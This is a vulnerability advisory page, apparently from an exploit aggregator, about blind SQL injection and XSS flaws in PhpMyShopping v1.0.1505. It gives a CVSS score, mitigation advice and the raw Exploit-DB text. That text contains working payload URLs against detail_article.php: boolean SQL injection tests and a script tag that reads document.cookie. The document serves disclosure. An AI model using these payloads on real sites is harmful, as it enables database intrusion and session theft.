PhpMyShopping Multiple Vulnerabilities

vendor:

PhpMyShopping

by:

Metropolis

7.5

CVSS

HIGH

Blind SQL Injections, XSS

CWE

Product Name: PhpMyShopping

Affected Version From: v1.0.1505

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

PhpMyShopping Multiple Vulnerabilities

PhpMyShopping v1.0.1505 is vulnerable to blind SQL injections and XSS attacks. The blind SQL injection vulnerability can be exploited through the 'detail_article.php' page with the 'C' and 'P' parameters. An attacker can manipulate these parameters to execute arbitrary SQL queries. The XSS vulnerability can also be exploited through the same page with the 'C' and 'P' parameters by injecting malicious JavaScript code.

Mitigation:

To mitigate the blind SQL injection vulnerability, it is recommended to implement proper input validation and parameterized queries. To mitigate the XSS vulnerability, it is recommended to implement proper input sanitization and output encoding.

Source

Exploit-DB raw data:

####################################################################
.:. Author : Metropolis
.:. Home : www.metropolis.fr.cr 
.:. Script : PhpMyShopping 
.:. Version : v1.0.1505
.:. Download Script: http://www.phpmyshopping.org/night_build/PhpMyShopping_mono_boutique_v1.0.1505.tar.gz
.:. Bug Type : Multiple Vulnerabilities / Blind SQL Injections / XSS 

####################################################################
 
===[ Blind Sql Injection ]===
 
SQL Error =>
 
/detail_article.php?C=3&P=7'
 
 www.site.com/detail_article.php?C=3&P=7 [Blind]

[Demo] :

www.site.com/detail_article.php?C=3&P=1 and 1=1 <-- true

www.site.com/detail_article.php?C=3&P=1 and 1=2 <-- false

===[ XSS ]===

 www.site.com/detail_article.php?C=3&P=7 [XSS]

[Demo] :
 
 www.site.com/detail_article.php?C=3&P=7"><script>alert(document.cookie);</script>


 ####################################################################